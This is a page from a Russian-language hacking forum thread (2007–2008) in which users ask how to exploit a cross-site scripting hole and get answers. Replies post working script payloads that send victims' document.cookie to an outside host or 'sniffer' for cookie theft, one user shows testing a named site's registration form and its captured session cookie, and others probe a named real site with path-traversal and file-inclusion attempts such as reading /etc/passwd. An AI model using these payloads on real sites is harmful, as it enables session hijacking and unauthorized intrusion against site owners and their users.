ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
Перезагрузить страницу Xss?
   
Ответ
Страница 3 из 4 < 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 17.12.2007, 18:06
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию
Цитата:
Сообщение от 159932  
это я и сам обнаружил - но я всё никак понять не могу что дальше ???
Это зависит от целей, которые ты преследуешь..
 
Ответить с цитированием

  #22  
Старый 17.12.2007, 18:15
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию
Цитата:
Это зависит от целей, которые ты преследуешь..
а вообщем что это может дать ?
 
Ответить с цитированием

  #23  
Старый 17.12.2007, 18:17
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию
Цитата:
Сообщение от 159932  
а вообщем что это может дать ?
к примеру угон cookies
 
Ответить с цитированием

  #24  
Старый 17.12.2007, 18:21
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию
Цитата:
к примеру угон cookies
а как это сделать ?
 
Ответить с цитированием

  #25  
Старый 17.12.2007, 18:37
Exlibris
Постоянный
Регистрация: 26.02.2007
Сообщений: 495
Провел на форуме:
3835614

Репутация: 1386
Отправить сообщение для Exlibris с помощью ICQ
По умолчанию
Цитата:
а как это сделать ?
<script>new image();img.src="http://site.ru/1.gif"+document.cookie;</script>
 
Ответить с цитированием

  #26  
Старый 07.02.2008, 03:09
Витян
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
Провел на форуме:
2544458

Репутация: 243
По умолчанию
сайт.ру/reg/
форма регистрации, в поле логин <script>alert(document.cookie)</script> в поле пароль 123, подтверждение пароля 123, выскакивает алерт с куками PHPSESSID=ac84f8bec0d0771323b85b0fe22c8812; 143b1a11a2512f8f5c6cfee8402ead19=-; mosvisitor=1, если вписать <script>img = new Image(); img.src = "http://мой_сниффер.gif?"+document.cookie;</script> то ничо не происходит и на сниффер ничо не приходит...чо сделать? чо курить?
Последний раз редактировалось Витян; 07.02.2008 в 03:15..
 
Ответить с цитированием

  #27  
Старый 07.02.2008, 04:56
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
Цитата:
сайт.ру/reg/
форма регистрации, в поле логин <script>alert(document.cookie)</script> в поле пароль 123, подтверждение пароля 123, выскакивает алерт с куками PHPSESSID=ac84f8bec0d0771323b85b0fe22c8812; 143b1a11a2512f8f5c6cfee8402ead19=-; mosvisitor=1, если вписать <script>img = new Image(); img.src = "http://мой_сниффер.gif?"+document.cookie;</script> то ничо не происходит и на сниффер ничо не приходит...чо сделать? чо курить?
а тебе не приходила мысль, что, что бы поймать куки нужно, что бы кто-то другой данную операцию совершил =/
 
Ответить с цитированием

  #28  
Старый 07.02.2008, 12:24
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию
Цитата:
/etc/passwd не выводит ... а такой инклуд да я первый раз вижу ... я по скулю лучше
И не выведет, ибо SAFE MODE. Remote include тем более не прокатит, ибо настройки не позволяют. Можно инклудить лишь файлы того сайта+раскрытие директории
 
Ответить с цитированием

  #29  
Старый 01.03.2008, 23:54
Digital Cat
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
Провел на форуме:
1297994

Репутация: 237
Отправить сообщение для Digital Cat с помощью ICQ
По умолчанию
Warning: include(cash/4.dat) [function.include]: failed to open stream: No such file or directory in /home/us1958/horse.ru/www/forum/include/footer.php on line 74

If you beleive that this error is due to the server configuration problems please contact your local web-hosting support team.

Ммм... Сейчас попробую помучиться сама, вот насколько это перспективно?

http://www.horse.ru/forum/search.php?f=4
Но на сайте таких - завалиться..
 
Ответить с цитированием

  #30  
Старый 02.03.2008, 00:02
Digital Cat
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
Провел на форуме:
1297994

Репутация: 237
Отправить сообщение для Digital Cat с помощью ICQ
По умолчанию
http://www.horse.ru/forum/search.php?f=../%20&title=666666
Усе, застряла(((
Люди, что это вообще за хрень? :-/
Все-таки XSS?((
Последний раз редактировалось Digital Cat; 02.03.2008 в 00:32..
 
Ответить с цитированием
Ответ
Страница 3 из 4 < 1 2 3 4 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss без Xss k00p3r Чужие Статьи 5 08.09.2008 15:53
All xss RetRon Форумы 10 18.12.2005 21:54
Xss Расширенный межсайтовый скриптинг SNIFF Чужие Статьи 0 24.11.2005 08:08
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
XSS в Phorum<=5.0.14 tester2005 Уязвимости 22 17.03.2005 07:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ